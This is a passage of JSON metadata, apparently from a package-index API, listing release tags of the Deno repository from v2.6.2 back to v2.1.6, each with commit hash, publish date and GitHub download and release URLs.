o/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denola